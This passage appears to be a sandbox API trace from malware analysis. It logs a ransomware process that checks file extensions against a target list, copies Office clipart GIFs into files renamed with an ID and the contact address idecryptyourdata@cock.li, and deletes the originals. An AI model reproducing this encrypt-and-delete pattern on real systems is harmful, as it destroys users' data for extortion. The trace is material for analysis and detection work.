returned -1 [0061.599] lstrlenW (lpString=".ppt") returned 4 [0061.599] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.599] lstrlenW (lpString=".zip") returned 4 [0061.599] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.599] lstrlenW (lpString=".rar") returned 4 [0061.599] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.599] lstrlenW (lpString=".bz2") returned 4 [0061.599] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.599] lstrlenW (lpString=".7z") returned 3 [0061.599] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.600] lstrlenW (lpString=".dbf") returned 4 [0061.600] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.600] lstrlenW (lpString=".1cd") returned 4 [0061.600] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.600] lstrlenW (lpString=".jpg") returned 4 [0061.600] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.600] lstrlenW (lpString=".doc") returned 4 [0061.600] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.600] lstrlenW (lpString=".docx") returned 5 [0061.600] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.600] lstrlenW (lpString=".pdf") returned 4 [0061.600] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.600] lstrlenW (lpString=".xls") returned 4 [0061.600] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.600] lstrlenW (lpString=".xlsx") returned 5 [0061.600] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.600] lstrlenW (lpString=".ppt") returned 4 [0061.600] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.600] lstrlenW (lpString=".zip") returned 4 [0061.600] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.600] lstrlenW (lpString=".rar") returned 4 [0061.600] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.601] lstrlenW (lpString=".bz2") returned 4 [0061.601] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.601] lstrlenW (lpString=".7z") returned 3 [0061.601] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.601] lstrlenW (lpString=".dbf") returned 4 [0061.601] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.601] lstrlenW (lpString=".1cd") returned 4 [0061.601] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0061.601] lstrlenW (lpString=".jpg") returned 4 [0061.601] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.601] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.601] lstrlenW (lpString="AG00170_.GIF") returned 12 [0061.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.602] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=9248) returned 1 [0061.602] CloseHandle (hObject=0x350) returned 1 [0061.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 0x220 [0061.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.603] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.603] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.608] GetLastError () returned 0x0 [0061.609] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2420, lpOverlapped=0x0) returned 1 [0061.618] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2430, lpOverlapped=0x0) returned 1 [0061.619] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.619] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.619] SetEndOfFile (hFile=0x358) returned 1 [0061.620] CloseHandle (hObject=0x358) returned 1 [0061.620] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.620] SetEndOfFile (hFile=0x340) returned 1 [0061.621] CloseHandle (hObject=0x340) returned 1 [0061.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.622] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0061.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.622] lstrlenW (lpString=".doc") returned 4 [0061.622] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.622] lstrlenW (lpString=".docx") returned 5 [0061.622] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.622] lstrlenW (lpString=".pdf") returned 4 [0061.622] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.622] lstrlenW (lpString=".xls") returned 4 [0061.622] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.622] lstrlenW (lpString=".xlsx") returned 5 [0061.623] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.623] lstrlenW (lpString=".ppt") returned 4 [0061.623] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.623] lstrlenW (lpString=".zip") returned 4 [0061.623] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.623] lstrlenW (lpString=".rar") returned 4 [0061.623] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.623] lstrlenW (lpString=".bz2") returned 4 [0061.623] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.623] lstrlenW (lpString=".7z") returned 3 [0061.623] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.623] lstrlenW (lpString=".dbf") returned 4 [0061.623] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.623] lstrlenW (lpString=".1cd") returned 4 [0061.623] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.623] lstrlenW (lpString=".jpg") returned 4 [0061.623] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.623] lstrlenW (lpString=".doc") returned 4 [0061.623] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.623] lstrlenW (lpString=".docx") returned 5 [0061.623] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.623] lstrlenW (lpString=".pdf") returned 4 [0061.624] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.624] lstrlenW (lpString=".xls") returned 4 [0061.624] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.624] lstrlenW (lpString=".xlsx") returned 5 [0061.624] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.624] lstrlenW (lpString=".ppt") returned 4 [0061.624] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.624] lstrlenW (lpString=".zip") returned 4 [0061.624] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.624] lstrlenW (lpString=".rar") returned 4 [0061.624] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.624] lstrlenW (lpString=".bz2") returned 4 [0061.624] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.624] lstrlenW (lpString=".7z") returned 3 [0061.624] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.624] lstrlenW (lpString=".dbf") returned 4 [0061.624] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.624] lstrlenW (lpString=".1cd") returned 4 [0061.624] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0061.624] lstrlenW (lpString=".jpg") returned 4 [0061.624] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.625] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.625] lstrlenW (lpString="AG00172_.GIF") returned 12 [0061.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.625] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=4390) returned 1 [0061.625] CloseHandle (hObject=0x340) returned 1 [0061.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 0x220 [0061.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.625] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.625] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.643] GetLastError () returned 0x0 [0061.644] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1126, lpOverlapped=0x0) returned 1 [0061.645] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1130, lpOverlapped=0x0) returned 1 [0061.646] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.646] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.647] SetEndOfFile (hFile=0x358) returned 1 [0061.647] CloseHandle (hObject=0x358) returned 1 [0061.650] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.650] SetEndOfFile (hFile=0x340) returned 1 [0061.651] CloseHandle (hObject=0x340) returned 1 [0061.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.651] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0061.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.651] lstrlenW (lpString=".doc") returned 4 [0061.651] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.652] lstrlenW (lpString=".docx") returned 5 [0061.652] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.652] lstrlenW (lpString=".pdf") returned 4 [0061.652] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.652] lstrlenW (lpString=".xls") returned 4 [0061.652] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.652] lstrlenW (lpString=".xlsx") returned 5 [0061.652] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.652] lstrlenW (lpString=".ppt") returned 4 [0061.652] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.652] lstrlenW (lpString=".zip") returned 4 [0061.652] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.652] lstrlenW (lpString=".rar") returned 4 [0061.652] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.652] lstrlenW (lpString=".bz2") returned 4 [0061.652] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.652] lstrlenW (lpString=".7z") returned 3 [0061.652] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.652] lstrlenW (lpString=".dbf") returned 4 [0061.652] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.652] lstrlenW (lpString=".1cd") returned 4 [0061.652] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.652] lstrlenW (lpString=".jpg") returned 4 [0061.652] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.653] lstrlenW (lpString=".doc") returned 4 [0061.653] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.653] lstrlenW (lpString=".docx") returned 5 [0061.653] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.653] lstrlenW (lpString=".pdf") returned 4 [0061.653] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.653] lstrlenW (lpString=".xls") returned 4 [0061.653] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.653] lstrlenW (lpString=".xlsx") returned 5 [0061.653] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.653] lstrlenW (lpString=".ppt") returned 4 [0061.653] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.653] lstrlenW (lpString=".zip") returned 4 [0061.653] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.653] lstrlenW (lpString=".rar") returned 4 [0061.653] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.653] lstrlenW (lpString=".bz2") returned 4 [0061.653] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.653] lstrlenW (lpString=".7z") returned 3 [0061.653] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.653] lstrlenW (lpString=".dbf") returned 4 [0061.653] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.653] lstrlenW (lpString=".1cd") returned 4 [0061.653] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0061.654] lstrlenW (lpString=".jpg") returned 4 [0061.654] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.660] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.660] lstrlenW (lpString="AG00174_.GIF") returned 12 [0061.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.661] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3966) returned 1 [0061.661] CloseHandle (hObject=0x340) returned 1 [0061.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif")) returned 0x220 [0061.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.661] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.661] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.662] GetLastError () returned 0x0 [0061.662] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xf7e, lpOverlapped=0x0) returned 1 [0061.802] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf80, lpOverlapped=0x0) returned 1 [0061.803] ReadFile (in: hFile=0x340, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0061.803] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0061.803] SetEndOfFile (hFile=0x358) returned 1 [0061.803] CloseHandle (hObject=0x358) returned 1 [0061.821] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0061.821] SetEndOfFile (hFile=0x340) returned 1 [0061.822] CloseHandle (hObject=0x340) returned 1 [0061.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.822] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0061.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.822] lstrlenW (lpString=".doc") returned 4 [0061.822] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.822] lstrlenW (lpString=".docx") returned 5 [0061.822] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.822] lstrlenW (lpString=".pdf") returned 4 [0061.822] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString=".xls") returned 4 [0061.823] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString=".xlsx") returned 5 [0061.823] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.823] lstrlenW (lpString=".ppt") returned 4 [0061.823] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0061.823] lstrlenW (lpString=".zip") returned 4 [0061.823] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.823] lstrlenW (lpString=".rar") returned 